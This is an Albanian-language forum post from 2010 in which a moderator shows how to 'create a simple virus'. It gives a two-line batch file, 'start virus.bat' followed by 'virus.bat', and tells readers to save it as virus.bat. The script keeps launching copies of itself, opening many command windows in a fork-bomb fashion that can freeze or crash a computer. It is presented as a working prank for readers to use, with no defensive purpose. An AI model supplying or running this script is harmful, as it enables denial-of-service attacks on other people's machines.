Krijo virus te thjesht .....

  Share
  avatar
  Zone-X
  Moderator
  Moderator

  Poenat : 138
  Reputacioni : 0
  Numri i postimeve : 64

  Krijo virus te thjesht .....

  Mesazh nga Zone-X prej Tue Jan 26, 2010 8:19 pm

  Ky eshte nje virus i dobt vetem te qel shum cmd-ja shum dritare.
  Hapim notepadin edhe e shenojm kete:
  start virus.bat
  virus.bat
  Dhe E bejm Save As Emrin Ja Bejme Virus .bat

   Ora është Sun Dec 16, 2018 6:43 pm